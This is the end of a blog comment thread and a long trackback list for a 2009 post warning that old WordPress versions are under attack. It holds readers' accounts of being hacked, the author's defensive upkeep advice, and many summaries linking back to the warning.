      Yes, but you must step up your upgrade as there are several big database changes in the betweens. Backup up everything or consider doing an XML export and then import it after you upgrade. You’ll have to upgrade and replace your Theme and all WordPress Plugins. It’s a big job, but if you can’t edit or change anything, it is highly likely your site has been hacked and invaded by some lovely specimen that causes havoc on the web. This could be serious. Don’t delay.

  145. Posted April 13, 2011 at 4:27 pm | Permalink

    My WordPress blog is up-to-date(I’ve updated it) but the nagscreen don’t dissapear and tell me that I’ve to upgrade it !

  146. Marcelo Bessi
    Posted April 14, 2011 at 11:00 am | Permalink

    WordPress.com is running the latest version of WordPress mu at pretty much all times!!

  147. yvonne nolte
    Posted June 1, 2011 at 2:02 am | Permalink

    it’s an important guides to prevent any attack to our wordpress blog. thanks.

  148. stacie smith
    Posted July 10, 2011 at 2:15 pm | Permalink

    I had experienced being hacked. My site won’t show the posts that I have made. A Russian-sounding song was playing instead. Because I’m not a website savvy, I hired someone to do the job. We had to reload my posts again because that was the easy solution to make. Thanks for this tips, even if this was made few years ago, it’s very useful still. Thanks.

    • Posted July 11, 2011 at 9:03 am | Permalink

      The threat does not go away because the post might be “dated.” :D Sorry you had to hire someone, but that is what can happen when you don’t update immediately after a mandatory security update.

  149. Amit
    Posted August 25, 2011 at 12:04 pm | Permalink

    Yes ,We must keep updated our wordpress versions ,Otherwise we will be hacked

  150. Antony Pratap
    Posted September 27, 2011 at 5:20 am | Permalink

    My blogs have been attacked so many times. Thank you very much, I know what to do now.

  151. Posted February 4, 2012 at 6:58 am | Permalink

    I still have some problems with being hacked now and again. How can I best secure my wordpress?

    • Posted February 4, 2012 at 10:24 am | Permalink

      Depends upon what you mean by “hacked.” There are many articles on this site and others with all kinds of advice on protecting the security level of your WordPress site or any site on any platform. Use your administration login only when you have to change design and core elements. Use an Editor user login for publishing to limit access if that password is captured and used by others. Upgrade WordPress with every mandatory upgrade without delay. Don’t download, upload, or click on anything you don’t know or trust. Don’t use WordPress Themes or Plugins from untrusted sources. That’s pretty much it.

  152. Posted December 2, 2012 at 4:09 am | Permalink

    Yes I have came across this worst attack.. Unfortunately I have problem with auto updating wordpress

    • Posted December 2, 2012 at 12:26 pm | Permalink

      Your comment form says you are on WordPress.com, but I assume you are not as WordPress.com sites are protected extensively. Sorry for your issue. Contact your server to help.

  153. Asa
    Posted May 28, 2013 at 11:03 pm | Permalink

    Updating becomes a problem if you have customized files. especially the core wordpress files.

    • Posted May 29, 2013 at 10:44 am | Permalink

      Editing WordPress core files is seriously wrong. There are no reasons today to do so. All such “customizations” are to be done with WordPress Plugins or Themes. Don’t do it. Ever. For that reason and so many more.

  154. Gaurav Heera
    Posted July 15, 2013 at 12:19 am | Permalink

    thanks for the valuable info….

    it’s really a big issue……span attacks may kill a blog over night.

    will definitely follow your instructions.

    • Posted July 15, 2013 at 8:09 am | Permalink

      Spam doesn’t kill a blog. Viruses, hacks, malware, DNS, the list of what can get a site, and often it takes months or years to be detected, are the plague of the web.

      Thanks.

  155. sagarmdesai
    Posted September 2, 2013 at 4:42 am | Permalink

    Hey thanks for the valuable info.

    • Posted September 3, 2013 at 1:33 pm | Permalink

      Thank you. Be aware that this is an old article though the links and information is still relevant. Please update WordPress immediately if you haven’t already to keep your site up to date against security risks. Thanks.

  156. Posted November 9, 2013 at 2:27 am | Permalink

    I always update wordpress. thanks for the info

  157. Neha
    Posted December 16, 2013 at 5:19 am | Permalink

    now i regularly update my wordpress..thanks for the information..!!

  158. Angelina
    Posted December 21, 2013 at 11:59 pm | Permalink

    yes..updating is the solution..thANKS FOR THE UPDATE…!!

  159. sharma
    Posted December 28, 2013 at 3:04 am | Permalink

    thanks for the update its was essential…!!!!I saw a few tags which include “eval” in the theme so I was going to erase them. (Naturally) I realized, however, that my code was indeed CODED that way. So I looked up the PHP term “eval” and sure enough it’s part of a loop. REPL is what it’s referred to. So, I reread the article and realized you said it was in permalinks. I’m very happy to see that that is all it turned out to be.. lol. Relieved really.

  160. jamesjohnonline
    Posted July 23, 2014 at 6:58 am | Permalink

    Hi , Thanks for this nice piece of Information .Myblog have been recently receiving too much Brute Force attacks .I have installed the WordPress Limit Login plugin and solved that issue to a greater extend

    • Posted July 23, 2014 at 5:30 pm | Permalink

      Glad that helped, but remember that updating immediately is your best and first line of defense.

  161. Rahul Shishodia
    Posted August 4, 2014 at 9:23 pm | Permalink

    Very useful info, upgraded my blog to 3.9.1

    Thanks

  162. Harman Gill
    Posted August 22, 2014 at 7:31 am | Permalink

    Hello i ahve a wordpress site but after updating wordpress css of my theme is not working.i have update theme many times but no works..plz tell me any salution.i am using Sahifa theme and i dont want change my theme..thanx in advance

    • Posted August 22, 2014 at 11:54 pm | Permalink

      Do not update a WordPress Theme without working on a Child Theme version of the Theme.

      There could be many reasons why the changes do not work. Contact the Theme author or WordPress support forum for more specific help.

  163. Dcntrahul
    Posted September 20, 2014 at 1:08 am | Permalink

    Hey thanks for the info.. Updating my WordPress blog..


443 Trackbacks/Pingbacks

  1. [...] Old WordPress Versions Under Attack: Older version of WordPress are being attacked and characters are being added to the permalinks. Sure signs of the attack include strange characters in your permalinks (single posts do not work) and an extra administrator account in the users control panel which you cannot see. Look for the administrator count in brackets at the top. Is the number there what you would expect on your blog? [...]

  2. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ Lorelle dice que afecta a versiones antiguas pero también está afectando a versiones actuales [...]

  3. [...] Read at Lorelle on WordPress [...]

  4. [...] the original post: Old WordPress Versions Under Attack « Lorelle on WordPress Comments0 Leave a Reply Click here to cancel [...]

  5. [...] abonezi prin RSS feed sau email pentru a primi ultimele posturi. E gratis!Lorelle explica detaliat problema si solutiile, ideea e sa updatati imediat WordPress la ultima versiune, daca nu ati facut-o pana acum. [...]

  6. [...] website, heads up and here’s a good article with links to other useful articles: “Old WordPress Versions Under Attack” by Lorelle on [...]

  7. [...] with its simple dashboard and ease of navigation. Hence, it is fast becoming a hot ground for hacking too. Hence, its constant versioning has kept the developers busy. This reminds me of Windows being [...]

  8. [...] Full report at Lorelle on WordPress. [...]

  9. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ (@Tweetmeme first alerted me to it) [...]

  10. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ Lorelle dice que afecta a versiones antiguas pero también está afectando a versiones actuales [...]

  11. [...] can find a lot more info at Lorelle’s Blog. Posted by zen   @   5 September 2009 0 comments Tags : hack , [...]

  12. [...] More here: Old WordPress Versions Under Attack « Lorelle on WordPress [...]

  13. [...] attack, wordpress hack, WordPress News, wordpress permalinks, … View example here: Old WordPress Versions Under Attack « Lorelle on WordPress Posted in Uncategorized | Tags: and-filed, and-posted, entry, lorelle, posted-on-september, [...]

  14. [...] Major WordPress Attack Underway! Posted by geeknews at 9:02 PM on September 4, 2009 If you are running a older version of WP version 2.8.3 or before you need to upgrade immediately. You risk having to re-install WordPress, this appears to be a pretty major attack. If you host your blog at wordpress.com you are ok. This attack is reportedly growing by the hour. [...]

  15. [...] Read at Lorelle on WordPress [...]

  16. [...] ini belum saya tulis semua. Anda bisa baca lebih lengkap di Old WordPress Versions Under Attack. Ada banyak link ke postingan penting di sana. AYoo.. [...]

  17. [...] Remote Desktop 3.3.1 Client Update Now AvailableSnow Leopard and Rosetta Interesting on the WebOld WordPress Versions Under AttackSnow Leopard's Four Best Improvements (for Civilians)MacJury #913: Passing Judgement on Snow [...]

  18. [...] must realize it is that if you maintain your own blog using this blogging tool, keep it up to date! As this article illustrates, having your WP blog hacked is not nearly as unlikely as we might like to [...]

  19. [...] meng-upgrade blog Anda dan mengubah password anda dengan yang lebih kuat, anda dapat mengunjungi Lorelle’s Blog untuk menemukan lebih banyak cara untuk mengamankan menginstal dan menghapus account admin [...]

  20. [...] is a strange post: Old WordPress Versions Under Attack « Lorelle upon WordPress Related Posts:Breaking: WordPress MySQL injection – how to fix latest attack [...]

  21. [...] If you use self-hosted WordPress for your blog and you’re not using the latest version, 2.8.4, you’re running a severe risk of your site security being compromised and even [...]

  22. [...] you so much for Lorelle on WP for making a post about this, so I got the news (check Lorelle’s post for all the [...]

  23. [...] informatie over wat je kunt doen om een hack te voorkomen vind je in het artikel van Lorelle van vannacht en de onderstaande lijst van [...]

  24. [...] bezpieczeństwem. Ilość zaatakowanych stron rośnie z godziny na godzinę. Jest tak poważna, że Lorelle VanFossen w swoim poście na blogu zaleca wykonanie aktualizacji do najnowszej wersji przed kontynuacją [...]

  25. [...] Så det är bara att sätta igång att uppdatera! Läs mer på Lorelle on WordPress. [...]

  26. [...] Old WordPress Versions Under AttackSeptember 4, 2009 [...]

  27. [...] I have since fixed it – but the attack was typical of the description at this helpful website: Old WordPress Versions Under Attack Lorelle on WordPress My permalinks were changed, so the posts were inaccessible. I also had a 'hidden' admin set up, [...]

  28. [...] An article explaining this in more detail: Old WordPress Versions Under Attack Lorelle on WordPress A way to get rid of the 'hidden' admin: WordPress Permalink & Rss problems If you need to do [...]

  29. [...] מסתבר שביום האחרון נוצלה פרצת אבטחה בגרסאות ישנות של וורדפרס להגדרת משתמש בעל הרשאות אדמין. משום מה תוך כדי הפורץ הרס את הקישורים אחרת זה בטח לא היה מתגלה… פרטים אצל לורל. [...]

  30. [...] If you use self-hosted WordPress for your blog and you’re not using the latest version, 2.8.4, you’re running a severe risk of your site security being compromised and even [...]

  31. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  32. [...] Lorelle has news that older versions of WordPress are being attacked. Symptoms include: [...]

  33. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  34. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  35. [...] Lorelle and OttoDestruct are alerting WordPress users, urging them to upgrade now. [...]

  36. [...] Old WordPress Versions Under Attack « Lorelle on WordPress a few seconds ago from Gwibber [...]

  37. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  38. [...] Techcrunch se hace eco de un nuevo ataque a versiones antiguas de WordPress que se está reportando en Lorelle. [...]

  39. [...] mere om hackerangrebet og forebyggelse her Posted in Blive [...]

  40. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  41. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  42. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  43. [...] San Francisco, Security Threat, Security Threats, WordPress We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  44. [...] issue is all about, including the tell-tale signs that suggest your site may have been compromised, read Lorelle VanFossen’s post with the alert about this issue. She also has links to some terrific resources on how to strengthen [...]

  45. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  46. [...] জন্য একটি সর্তকবানী। কিছুক্ষন আগে Lorelle VanFossen এর সূত্র ধরে TechCrunch সকল পুরোনো র্ভাসনের [...]

  47. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  48. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  49. [...] of WordPress at the moment, which is WordPress 2.8.4 Released. Lorelle has a good writeup on how old WordPress versions are under attack. To summarize, here’s what to look out for if you think your WordPress site may have been [...]

  50. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  51. [...] WordPress Under Attack [...]

  52. [...] : Link Posted in Tech/Science « Bit.ly Launches J.mp : Smaller URL by 2 Characters You can [...]

  53. [...] Jinnat Ul Hasan on September 5, 2009 Today, mentioning a blog post byLorelle VanFossen, TechCrunch has warned bloggers using old version of WordPress that they may become a object to [...]

  54. [...] Threat: WordPress Under Attack September 5th, 2009 We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  55. [...] [Lorelle on WordPress ] Also Read WordPress 2.8.4 Security Release AvailableAn Unexpected WordPress 2.8.2 Security [...]

  56. [...] of WordPress than the current version (2.8.4 as of this writing), you need to upgrade now! From Lorelle on WordPress: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an [...]

  57. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  58. [...] of WordPress than the current version (2.8.4 as of this writing), you need to upgrade now! From Lorelle on WordPress: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an [...]

  59. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  60. [...] Old WordPress Versions Under Attack « Lorelle on WordPress You should update WordPress to the latest version as soon as possible, as all versions prior to 2.8.3 are at risk. (tags: WordPress security) Leave a Reply Click here to cancel reply. [...]

  61. [...] of WordPress at the moment, which is WordPress 2.8.4 Released. Lorelle has a good writeup on how old WordPress versions are under attack. To summarize, here’s what to look out for if you think your WordPress site may have been [...]

  62. [...] gelesen, das eine Sicherheitslücke in WordPress entdeckt wurde! Also alle, die noch nicht bei Version 2.8.4 sind: Updaten! Wer schon betroffen ist [...]

  63. [...] server it is vital that you upgrade to the current version now. Here are some of the details from Lorelle on WordPress, read them now and update ASAP: Update your WordPress blog before you continue reading this post. [...]

  64. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  65. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  66. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  67. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  68. [...] an ongoing attack. Users of WordPress.com hosted blogs are not affected. The warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  69. [...] more info on the attack. If you have a WordPress site, PLEASE READ THIS: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ This entry was posted on Saturday, September 5th, 2009 at 7:31 am. You can follow any responses [...]

  70. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  71. [...] Yesterday, I went to post my blog entry, and discovered that a lot of links on my blog didn't work. I eventually discovered that it wasn't an isolated problem, but was an instance of this attack. [...]

  72. [...] Old WordPress Versions Under Attack « Lorelle on WordPress [...]

  73. [...] Lorelle on WordPress en Mashable wordt de boodschap verspreid dat er een grote WordPress-aanval bezig is. Ter [...]

  74. [...] 5th, 2009 John Q. Public Leave a comment Go to comments We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  75. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  76. [...] Old WordPress Versions Under Attack – Upgrade to the newest version to prevent infection. Also Microsoft: Cyber-crooks exploiting [...]

  77. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  78. [...] Threat: WordPress Under Attack Sep 5 Main We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  79. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  80. [...] Old WordPress Versions Under Attack « Lorelle on WordPresslorelle.wordpress.com [...]

  81. [...] Lorelle und WPBeginner.com. Via Twitter bzw. via Frank [...]

  82. [...] www@www.com. This user must also be deleted manually from the DB since it does not show up in the Read more Share and [...]

  83. [...] warning comes from Lorelle on WordPress after it was discovered that the pernicious attack is exploiting security holes in previous [...]

  84. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  85. [...] aber wahr: es hat den Anschein, dass mein kleines Blog am Mittwoch um 2:16 Uhr morgens Opfer einer Attacke wurde. Es begann mit der Registrierung eines Benutzers namens “MikeWink”. Danach hatten [...]

  86. [...] Read at Lorelle on WordPress [...]

  87. [...] voi non avete mai inserito siete stati attaccati. Per ulteriori informazioni potete consultare la pagina di Lorelle in continuo aggiornamento. Tag: [...]

  88. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  89. [...] Source:Old WordPress Versions Under Attack « Lorelle on WordPress [...]

  90. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  91. [...] Quell-News sind in englisch bei TechCrunch nachzulesen, in einem dort verlinkten Blogartikel ist davon die Rede, dass alle Versionen, die älter als 2.8.3 sind, anfällig für den [...]

  92. [...] করুন। হাসান ভাইয়ের ব্লগ mashable.com (ইংরেজী) lorelle.wordpress.com [...]

  93. [...] Old WordPress Versions Under Attack Protect your WordPress blog now: UPDATE NOW!!! Update your WordPress blog before you continue reading this post. That’s how critical this issue is. [...]

  94. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  95. [...] Akkurat nå går det en storstilt kampanje på Twitter om å oppgradere WordPress i dag, grunnet Lorelle’s artikkel Old WordPress Versions Under Attack [...]

  96. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  97. [...] other sites that have been talking about the WordPress attack. And the most comprehensive one is on Lorelle.  I recommend that you take note of the post.  Incase you don’t read it , I will post a [...]

  98. [...] This warning from Lorelle shows how critical the issue is. [...]

  99. [...] einem Blogeintrag von Lorellegibt es derzeit eine große Angriffswelle auf WordPress-Blogs. Daher sei gesagt: Nur die [...]

  100. [...] are coming out from Mashable and Lorelle on WordPress about a hack attack on all websites using WordPress as their blogging application. Everyone has [...]

  101. [...] to Mashable, the warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  102. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  103. [...] upgraded the site to the latest version of WordPress in response to reports of a serious attack on older versions (if you’re running any version earlier than the new 2.8.4, go read about it [...]

  104. [...] reported on it: http://www.barbaraling.com/insights/…iant-headline/ as did Lorelle. Old WordPress Versions Under Attack Lorelle on WordPress __________________ SEO Makes The World Go 'Round [...]

  105. [...] to Lorelle on WordPress, a site dedicated to all things WordPress, it has been discovered that hackers have discovered a [...]

  106. [...] a few hours ago I discovered that one of my major blogs — http://howtoplaza.com — was hacked (read about the latest hacker attacks on WordPress blogs). I did some research and most of the solutions I found were quite vague, and the WordPress website [...]

  107. [...] VanFossen / Lorelle on WordPress: Old WordPress Versions Under Attack  —  Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that [...]

  108. [...] sau a lipsei de implicare din partea administratorilor, iar în această după-amiază am fost martorul unor anunţuri aproape disperate, prin care cei în măsură să acţioneze erau imploraţi să facă DE URGENŢĂ actualizarea [...]

  109. [...] are latest reports that WordPress blogs using old versions are under attack and are under security risk. It is [...]

  110. [...] We’re hearing of numerous reports [...]

  111. [...] Anyway, this time they also put some malicious code on my archive pages. Google sent me an email saying they had removed my blog from its index. That got a whole team to look into how they broke in. Now thanks to TechCrunch and Mashable you know there was a vulnerability in WordPress which let them break in. Even more good details on Lorelle’s blog. [...]

  112. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  113. [...] warning comes from Lorelle on WordPress after it was discovered that a some attacks are exploiting security holes in older versions of the [...]

  114. [...] vulnerability was discovered yesterday, and the number of sites that have been attacked is continuing to grow. The security of your site [...]

  115. [...] don’t have the latest version of wordress, NOW is the time to do it. The warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  116. [...] source of the news comes from Lorelle on WordPress. It has then been reported by tech blogs such as TechCrunch and Mashable!  Just thought it’s [...]

  117. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  118. [...] Attacks against all but latest WordPress. So if you haven’t upgraded do so. With the latest versions of WP upgrading is ridiculously easy as well. [...]

  119. [...] many. In fact, I even took the time to comment on Lorelle’s blog regarding her post entitled, “Old WordPress Versions Under Attack” hoping that somehow I could contribute to the [...]

  120. [...] All versions other than the very latest are apparently susceptible. I have to wonder when WordPress users will start switching to some other platform.  ?  [From Large Scale Attack Against WordPress Installations Underway] [...]

  121. [...] Lorelle announced on her blog that older WordPress versions were getting hacked. [...]

  122. [...] Old WordPress Versions Under Attack – Upgrade to the newest version to prevent infection. Also Microsoft: Cyber-crooks exploiting [...]

  123. [...] that you should know about this attack are following as per lorelle: 1. Reports are that this attack impacts ALL versions of WordPress up to 2.8.4, the most recent [...]

  124. [...] För att se om du drabbats eller inte och vad du ska göra ifall du har blivit attackerad läs här. [...]

  125. [...] O aviso surgiu da própria comunidade de desenvolvedores do WordPress e está sendo divulgado por um dos mais respeitados blogs sobre o tema, Lorelle on WordPress. [...]

  126. Upgrade your WordPress sites NOW!…

    Older versions of WordPress are being attacked!  You should upgrade to the latest version immediately.  The newest version is not susceptible to the type of attacks that are occurring.   Read about the attacks and what you should do if you’ve alr…

  127. [...] Lorelle VanFossen écrivait sur son blog: [...]

  128. [...] to the latest version (2.8.4) are vulnerable to a serious, active security threat.  Respected WordPress blogger Lorelle, explains that there are two clues you should look for, to see if your WordPress blog has already [...]

  129. [...] Old WordPress Versions Under Attack « Lorelle on WordPress a few seconds ago from web [...]

  130. [...] Original source : http://lorelle.wordpress.com/2009/09/04/old-wordpr&#8230; [...]

  131. [...] that you should know about this attack are following as per lorelle: 1. Reports are that this attack impacts ALL versions of WordPress up to 2.8.4, the most recent [...]

  132. [...] = 'http://kkoepke.de/1/wordpress-attacke-unbeding-updaten/&#39;;tweetmeme_source = 'kkoepke';Wie Lorelle auf heute berichtet, sind vermehrt Angriffe auf WordPress Blogs gemeldet worden. Es ist dringend [...]

  133. [...] blogsphere and social media sites, and also confirmed by Otto42, a key WordPress developer and Lorelle has confirmed that old versions are under attack and the number of sites hit by this is growing [...]

  134. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  135. [...] WordPress goddess issued dire warnings today, about hacks in the offing which forced me to do a rather hasty upgrade of my installation to the [...]

  136. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  137. [...] [...]

  138. [...] Lorelle and OttoDestruct are alerting WordPress users, urging them to upgrade now. [...]

  139. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  140. [...] vjen nga Lorelle nga WordPress e cila [...]

  141. [...] This critical warning comes from Lorelle on WordPress. [...]

  142. [...] Old WordPress Versions Under Attack « Lorelle on WordPress. [...]

  143. [...] to Lorelle on WordPress: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an [...]

  144. [...] is a particularly nasty WordPress attack making the rounds right now which Lorelle talks about on her blog. If you are not running the latest version of WordPress (2.8.4), you should upgrade [...]

  145. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  146. [...] O istniejącym zagrożeniu poinformowano na blogu Lorelle (również opartym na WordPressie), po tym jak okazało się, że hakerzy wykorzystują luki w zabezpieczeniach, które znajdują się w starszych wersjach oprogramowania. Metoda działania jest bardzo prosta. Utworzone zostaje nowe konto administratora, co pozwala uzyskać dostęp do bazy danych. Co gorsza, liczba ataków rośnie z godziny na godzinę. [...]

  147. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  148. [...] as well as a community of enthusiasts. It’s thanks to that community, led by a wonderful Lorelle VanFossen in this case, that we even know about the current [...]

  149. [...] seems that old versions of wordpress are under attack.  If you have a self-hosted version of wordpress (ie, your blog is not on the wordpress.com [...]

  150. [...] right down to the database level. These attacks are said to be “growing by the hour”. Lorelle (who first discovered it) writes: There are two clues that your WordPress site has been [...]

  151. [...] Lorelle explains, a new attack seems to be making the rounds amongst older versions of WordPress and wreaking havoc [...]

  152. [...] Shared Old WordPress Versions Under Attack « Lorelle on WordPress. [...]

  153. [...] Lorelle detalla la problemática muy bien en su blog (en inglés). [...]

  154. [...] are here (and also on WordPress’s [...]

  155. [...] Old WordPress Versions Under Attack | Lorelle on WordPress 〈WordPress の旧バージョンが攻撃にさらされている〉 [...]

  156. [...] … read this. [...]

  157. [...] [...]

  158. [...] this blog by Lorelle on how to secure your blog and what to do if it has already been attacked. Check out the Follow-Up [...]

  159. [...] like there's a pretty glaring hole in all but the most recent version of WordPress. A brief inspection of this site reveals that I'm way behind current and was broken in to. A fresh [...]

  160. [...] may have already heard that sites running out-of-date versions of WordPress have been under attack (Lorelle, Weblog Tools Collection, WordPress Dev Blog). Of course, sites running the latest version of the [...]

  161. [...] Dark Max Portfolio More Photos FanStress su wordpress.com 6 Settembre 2009, 01:02 Archiviato in: Annunci, WordPress A fine dicembre sarebbe scaduto l’hosting multidominio dove era ospitato il blog e c’era già l’idea di spostare baracca e burattini su WP.com, ma ho deciso di anticipare i tempi data ormai la mia scarsa voglia di occuparmi della manutenzione tecnica del sito e quindi ad una probabile latitanza nell’aggiornamento di WordPress, cosa non molto saggia visti gli ultimi avventimenti. [...]

  162. [...] la sicurezza del nostro blog, tranne che in casi speciali. In questo caso, invece, come ci spiega Lorelle On WordPress, a causa di una nuova vulnerabilità tutti gli utenti WordPress che non utilizzano l’ultima [...]

  163. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  164. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  165. [...] this weekend, a major exploit attack has been taking place on old versions of self-hosted blogging platform WordPress. If you are using [...]

  166. [...] Old WordPress versions – apart from 2.8.4 – under risk of attack: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!! [...]

  167. [...] the time of writing, an attack on WordPress is in progress. Unfortunately a security chink in older versions of the blogging application has been located and [...]

  168. [...] more information on this attack and how to protect new and already hacked blogs, can be found at Lorelle’s blog. A must check out for every WordPress using a version older than [...]

  169. [...] an ongoing attack. Users of WordPress.com hosted blogs are not affected. The warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  170. [...] 世界でもっとも利用されているブログエンジン「WordPress」の古いバージョンをねらったワームがひろがっていると言う報告が多数出ている。 [...]

  171. [...] Read at Lorelle on WordPress [...]

  172. [...] some reports that there is an “attack” on older versions of WordPress right now. According to a study [...]

  173. [...] Original Post by Lorelle Share and Enjoy: [...]

  174. [...] vulnerable – and being hit – by a worm that affects any old (ie before 2.8.4) version.Details are here (and also on WordPress's site). As Matt Mullenweg, who has played a key part in the development [...]

  175. [...] enumerates some symptoms to know if your site has been affected by the worm: There are two clues that your WordPress site [...]

  176. [...] Threat: WordPress Under Attack We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  177. [...] More at Lorelle: [...]

  178. [...] is excellent. I’m sending it to my editors tonight- these are some of the big… Recent LinksOld WordPress Versions Under AttackLorelle on WordPress | September 4, 2009Daniel Bachhuber says: Using an exploit that has been [...]

  179. [...] Old WordPress Versions Under Attack (tags: wordpress-security howto tips wordpress security hacks php cms advice alert) Follow RCC Graphic Designs on Twitter. This entry was posted on Saturday, September 5th, 2009 at 11:04 pm and is filed under Articles. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site. blog comments powered by Disqus var disqus_url = 'http://www.rccgd.com/2009/09/05/rommels-daily-links-for-september-6-2009/ '; var disqus_container_id = 'disqus_thread'; var facebookXdReceiverPath = 'http://www.rccgd.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm&#39;; var DsqLocal = { 'trackbacks': [ ], 'trackback_url': 'http://www.rccgd.com/2009/09/05/rommels-daily-links-for-september-6-2009/trackback/&#39; }; [...]

  180. [...] 06th, 2009 | Author: mel I just read a bulletin that claim that WordPress blogs are under attack. So I upgraded again, even though I was putting it off for weeks. Everything seems to be okay [...]

  181. [...] Old WordPress Versions Under Attack [...]

  182. [...] Old WordPress Versions Under Attack [...]

  183. [...] Apparently WordPress is under attack. As a result I was forced to upgrade despite my weeks of delaying. Here’s the story. [...]

  184. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  185. [...] Also in case your still questioning the status of your blog make sure to read the FAQ on the subject at – http://codex.wordpress.org/FAQ_My_site_was_hacked and to look out for odd behavior on your blog and look for changes/mods in links as the example given from Lorelle’s Blog Post [...]

  186. [...] è comparso sul blog “Lorelle“, dove è stato scoperto il bug che permette alle versioni precedenti di WordPress di creare [...]

  187. [...] la sicurezza del nostro blog, tranne che in casi speciali. In questo caso, invece, come ci spiega Lorelle On WordPress, a causa di una nuova vulnerabilità tutti gli utenti WordPress che non utilizzano l’ultima [...]

  188. [...] running older versions of the popular blogging software WordPress are reporting that their sites are being compromised by hackers. WordPress founder Matt Mullenwag has confirmed that older versions can be compromised [...]

  189. [...] This was first reported on Lorelle on WordPress. [...]

  190. [...] è comparso sul blog “Lorelle“, dove è stato scoperto il bug che permette alle versioni precedenti di WordPress di creare [...]

  191. [...] The upgrade is simple, even from such an old version. If you run your own version of WordPress make sure you’re current. Here’s why: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  192. [...] there have been reports that older versions of WordPress self-hosted blogs are under attack by an online creature named [...]

  193. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  194. [...] Read at Lorelle on WordPress [...]

  195. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  196. [...] il problema ieri su Lorelle On WordPress e oggi in maniera indiretta da Matt sul blog ufficiale, questa vurnerabilità trova la sua unica [...]

